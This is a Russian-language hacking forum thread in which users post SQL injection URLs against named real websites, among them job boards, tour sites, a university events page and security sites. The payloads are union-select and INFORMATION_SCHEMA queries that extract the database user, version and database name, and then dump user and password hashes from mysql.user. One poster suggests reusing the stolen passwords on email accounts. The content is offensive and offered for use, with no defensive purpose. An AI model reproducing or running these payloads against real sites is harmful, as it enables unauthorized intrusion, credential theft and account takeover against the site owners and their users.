на сайте делать нечего, может пароли подойдут к мылу =) ЗЫ Поставил в 13 столбик, т.к оттуда можно копировать. 2 и 3 передаются в тайтл, копировать нельзя, но смотреть удобнее
_http://justfind.hitv.ru/listing.php?cat=-1 Интересно вот это можно расковырять? _http://rabota.kz/candidates/vacancies.php?cat=1' раскрытие пути и только?
_http://www.erosfera.ru/browse.php?cat=8' Вызов мемберской функции, а мембер всего один: _http://www.erosfera.ru/user_search.php?pflag=search _http://www.erosfera.ru/[email protected] _http://www.erosfera.ru/search.php?keyword=-111+union+select+1,2,3/* P.S. Лан, херню не буду больше постить... сорри.
Code: http://referat.studentport.su/subtheme.php?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)-- etc..
Code: http://www.vvbohemia.com.ua/tours/?t=-1+union+select+user()/* Смотреть тайтл Code: http://events.wayne.edu/view.php?view=-1+union+select+1,user(),3/* [email protected] Code: http://securities.org.ua/securities_paper/review.php?id=322&pub=-1+union+select+1,2,database(),4,5,6,7,8,9/*
www.internetsecurity.ru Code: __http://www.internetsecurity.ru/arts.php?333%27%20/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10/* __http://www.internetsecurity.ru/arts.php?333%27%20/**/union/**/select/**/1,version(),database(),4,5,6,7,8,9,user()/*
Code: http://ul-online.ru/modules/job/vacancy.php?id=-1+union+select+1,user(),version(),4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+mysql.user-- Первая доведенная до конца)). надеюсь не боян
PHP: http://ul-online.ru/modules/job/vacancy.php?id=-1+union+select+1,user(),version(),user,password,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from%20+mysql.user--
